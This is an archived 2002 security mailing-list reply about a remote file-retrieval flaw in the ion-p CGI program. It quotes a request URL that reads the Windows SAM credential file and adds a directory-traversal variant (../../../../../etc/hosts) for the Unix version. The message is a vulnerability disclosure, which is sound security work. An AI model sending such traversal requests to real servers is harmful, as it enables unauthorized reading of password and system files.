Re: ion-p.exe allows Remote File Retrieving

From: Stuart Moore (smoore.bugtraqat_private)
Date: Fri Nov 01 2002 - 13:42:55 PST

Next message: K. K. Mookhey: "[VulnWatch] Weak Password Encryption Scheme in MS SQL Server"

Previous message: Zero-X www.lobnan.de Team: "ion-p.exe allows Remote File Retrieving"
Maybe in reply to: Zero-X www.lobnan.de Team: "ion-p.exe allows Remote File Retrieving"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

> ion-p.exe allows Remote File Retrieving
>
> www.Server.com/cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
>

The 'ion-p' *NIX version is also vulnerable.  Directory traversal chars can be used, too:

/cgi-bin/ion-p?page=../../../../../etc/hosts 


Bye,

Stuart


-- 
Stuart Moore
SecurityTracker.com
SecurityGlobal.net LLC

Next message: K. K. Mookhey: "[VulnWatch] Weak Password Encryption Scheme in MS SQL Server"
Previous message: Zero-X www.lobnan.de Team: "ion-p.exe allows Remote File Retrieving"
Maybe in reply to: Zero-X www.lobnan.de Team: "ion-p.exe allows Remote File Retrieving"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Nov 01 2002 - 14:01:45 PST